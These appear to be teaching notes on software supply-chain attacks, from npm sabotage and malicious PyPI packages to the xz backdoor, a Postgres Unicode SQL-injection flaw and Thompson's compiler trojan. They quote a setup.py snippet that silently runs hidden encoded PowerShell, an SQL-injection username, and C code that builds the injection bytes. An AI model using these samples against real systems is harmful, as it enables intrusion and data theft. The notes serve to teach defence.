    This was a tool to suspend inactive browser tabs, to conserve resources.
      It had two million users. The entire project was sold in 2020, and in 2021
      Google flagged it as containing malware. 
    Other package maintainers have been offered significant sums to sell
      their software. 
    npm colors and faker
      libraries
    Npm (Node.js Package Manager) is a large open repository for javascript
      tools. The colors and faker libraries were legit tools that appeared to
      have been corrupted by a malicious attacker in January 2022.
    Alas, the real situation turned out to be somewhat more complicated:
      package developer Marak Squires was simply really mad at big
      corporations using his packages without contributing any support. From www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps:
    
      The reason behind this mischief on the
        developer's part appears to be retaliation—against
        mega-corporations and commercial consumers of open-source projects
        who extensively rely on cost-free and community-powered software but do
        not, according to the developer, give back to the community.
       
      In November 2020, Marak had warned that he
        will no longer be supporting the big corporations with his "free work"
        and that commercial entities should consider either forking the projects
        or compensating the dev with a yearly "six figure" salary.
     
    
    This is a complicated development. Most open-source maintainers, while
      sympathetic, ultimately decided this was a terrible idea.
    PyPi
    This is the Python Package Index. Everybody uses it.
    FastAPI is a Python framework with a long history. In March 2022,
      legitimate package fastapi-toolkit
      was added. In November 2022, a commit with a malicious backdoor was
      accepted. It was detected. When incorporated into a web project, the
      backdoor allows an external attacker to run arbitrary Python, and make
      arbitrary SQL queries (including writes) using a specially crafted HTTP
      header. See securitylabs.datadoghq.com/articles/malicious-pypi-package-fastapi-toolkit.
    In February 2023, the Phylum team
      discovered over two thousand new packages that, while not necessarily
      malicious themselves, all contained the following code in the setup.py
      file:
    try:
        if not os.path.exists('tahg'):    # basically never exists
            subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB...AGMAaABlAC4AZQB4AGUAIgA=',
                             shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
    except: pass
        
    So to install this package is to run that mysterious base64-encoded executable. See blog.phylum.io/phylum-discovers-another-attack-on-pypi.
    100,000 infected Github repositories
    Beginning in late 2023, a malware group started a large-scale project to
      - fork popular Github repositories
      - infect them with malware
      - put them back on Github with a very similar name
    No one is quite sure how many malicious repos there are, but 100,000 or
      so have been identified. Identification is based on the
      automated clone process; manual malicious clones are not detected. The
      project name itself is the original one (eg numpy). 
    Many of the malicious github clones are based on the PyPi packages above.
    See apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack.
      There is an animated gif there, showing an exec() of a malicious string
      tabbed over way to the right.
    PyTorch
    Here's a discussion of how a White Hat team figured out how to attach malicious software to PyTorch, the machine-learning framework.
     Our exploit path resulted in the ability to
      upload malicious PyTorch releases to GitHub, upload releases to AWS,
      potentially add code to the main repository branch, backdoor PyTorch
      dependencies – the list goes on. In short, it was bad. Quite bad.
    Github allows repository-defined workflows (Github Actions) to run code as part of pull requests. This makes great sense for automated testing, but running untrusted code, particularly on a project's own self-hosted runners, is a problem.
    
    johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch.
      
        
     
    Google Search can be dangerous
    Brian Krebs has written about how hard it can be to find well-known free software packages using Google. The bad guys have not only created similar-looking websites, but in some cases they have paid, through legitimate Google advertising programs, to elevate their sites in the search results. See https://krebsonsecurity.com/2024/01/using-google-search-to-find-software-can-be-risky.
    The situation is just as bad with open-source packages intended for
      developers. See www.csoonline.com/article/654560/why-open-source-software-supply-chain-attacks-have-tripled-in-a-year.html
      and www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages.
    
    2024 xz vulnerability
    A serious supply-chain attack on ssh was published on March 29, 2024, by
      Andres Freund, who discovered it by noting an unexpected increase in the
      cpu usage of ssh. 
    Ssh, or Secure SHell, is the standard encrypted way of logging into remote machines. The attack got in through the xz compression library, liblzma, maintained by Lasse Collin (who is blameless here); on many Linux distributions the sshd server ends up linked against liblzma indirectly, by way of libsystemd.
    
    
    Here is a discussion of the attack itself: research.swtch.com/xz-script. Perhaps the most interesting technical part of the attack is how the malicious payload is concealed. xz has always had a test directory of random data; this is compressed and then the result is checked against what it was supposed to be. The attackers introduced a binary malicious payload into the test data! The standard configure script runs an m4 (well-known macro package) script, which (in a non-obvious way) extracts this binary payload and builds it into the library. When an incoming ssh connection presents a key belonging to the attacker, the payload enables remote command execution.
 
    
    
    But how did the xz project get compromised? This is in many ways the more interesting part. See research.swtch.com/xz-timeline. The package dates from 2004 (ssh is much older, but the xz connection came later). In October 2021, Jia Tan appears on the xz mailing list, and sends his first patch. He sends more. He gives every appearance of someone interested in helping the xz package move forward. It appears, by the way, that this is not a real name.
 
    
    
    In April 2022, Jigar Kumar emails the list
      complaining that the Tan patches have not been incorporated.
      Then Denis Ens similarly emails to complain about the Java
      version. Kumar continues to pressure Collin about how this
      project is just way behind, and that Collin needs to pick up the pace.
      (This sort of abuse is common enough in open source.) In June, Collin
      writes this:
    
      I haven't lost interest but my ability to care has been fairly limited
        mostly due to longterm mental health issues but also due to some other
        things. Recently I've worked off-list a bit with Jia Tan on XZ Utils and
        perhaps he will have a bigger role in the future, we'll see. It's also
        good to keep in mind that this is an unpaid hobby project.
     
    Soon enough, Collin bows to the pressure and Tan
      becomes a maintainer. But Tan takes his time, building more
      trust; the actual attack isn't loaded until March 9, 2024. 
    
    
    It is tempting to suspect that this is a nation-state project, given the two-year timeline; that takes patience. But there are some things to suggest maybe not. The Tan and Kumar email addresses have similar formats: Tan's handle is JiaT75, and Kumar's follows the same name-plus-digits pattern. And while the obfuscation technique is ingenious, there were some minor problems with the payload.
    
    
    The article at doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd suggests that what was really being backdoored was systemd, the master process launcher. I'm not quite convinced, but systemd does start sshd, and does have way too many dependencies.
 
    
    
    Finally, if you cloned the package from git and built
      it yourself, the bug would not be there. You had to be building for a
      deb/rpm package distribution.
    
      
2024 Postgres SQL-injection vulnerability
    
    Postgres has a long history of being careful to
      prevent SQL injection. Here's the basic example. You want to query the
      record of a specific user, to check their password, where $username is a
      string taken from the input:
    
    
        select * from users u where
      u.username = '$username'
    
    
    The idea is to supply as input the username
        bob' or 1=1;'
    This then expands naively into
        select * from users u where u.username = 'bob' or 1=1;''
    which returns all users, because the 1=1 condition is always true.
    But everyone knows to sanitize input with Postgres: the supplied string is run through the standard quoting/escaping routines (and many applications use parameterized queries, select * from users u where u.username = $1, as well). With escaping, all the quote marks (and other dangerous characters) in the $username string are escaped: the bad username above becomes bob\' or 1=1;\', and this is no longer incorrectly parsed. How does the new injection happen? Unicode!
    In UTF-8, a byte whose first three bits are 110 (for example 0xc0) is the lead byte of a two-byte sequence. If the Postgres string parser sees such a byte, and the following byte completes a legitimate two-byte sequence, then that two-byte Unicode character is returned.
    But, and here's the bug, if the byte following the 0xc0 does not make a legitimate two-byte sequence, then just the second byte is returned.
      So what the attackers did was use 0xc0 0x27. This is not a recognized
        Unicode sequence, and so the character 0x27 is returned.
      Which is a single quote mark: '
    So now the attackers can insert single quote marks into supposedly escaped data, which means our bad example above works even with the escaping in place, provided we replace each ' with 0xc0 0x27.
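    As a concrete illustration (a sketch I've constructed, not taken from the actual exploit), here is the crafted "username" as raw bytes; after the broken decode each 0xc0 0x27 pair collapses to a bare single quote, recreating the classic injection:
#include <stdio.h>

int main(void) {
    /* bob<0xc0 0x27> or 1=1;<0xc0 0x27>  -- the 0x27 bytes are single quotes */
    const unsigned char username[] = {
        'b', 'o', 'b',
        0xc0, 0x27,                /* invalid UTF-8 pair: survives escaping, decodes to ' */
        ' ', 'o', 'r', ' ', '1', '=', '1', ';',
        0xc0, 0x27,
        0
    };
    fwrite(username, 1, sizeof(username) - 1, stdout);
    putchar('\n');
    return 0;
}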
      This attack was used on the US Treasury in December 2024. More at slamdunksoftware.substack.com/p/hidden-messages-in-emojis-and-hacking.
     
    Thompson Backdoor
    Ken Thompson is one of the original developers of Unix. In his 1983
      Turing Award speech, "Reflections on Trusting Trust", he described the
      following hack:
    
      - The Unix login program is modified to allow in someone with a certain
        userid and password
 
      - The C compiler would insert this modification whenever login.c was
        compiled, so compiling from a clean copy of login.c wouldn't help
 
      - The C compiler would also insert modifications whenever it
        itself was recompiled, so recompiling the C compiler would still leave
        you with the Trojan in place.
 
    
    There was one more step: when the compiler was asked to disassemble the
      Trojaned code, it would show what the code was supposed to be,
      not what it actually was.
    Thompson did implement this as a demo. Nobody really thinks
      anyone is trying this today.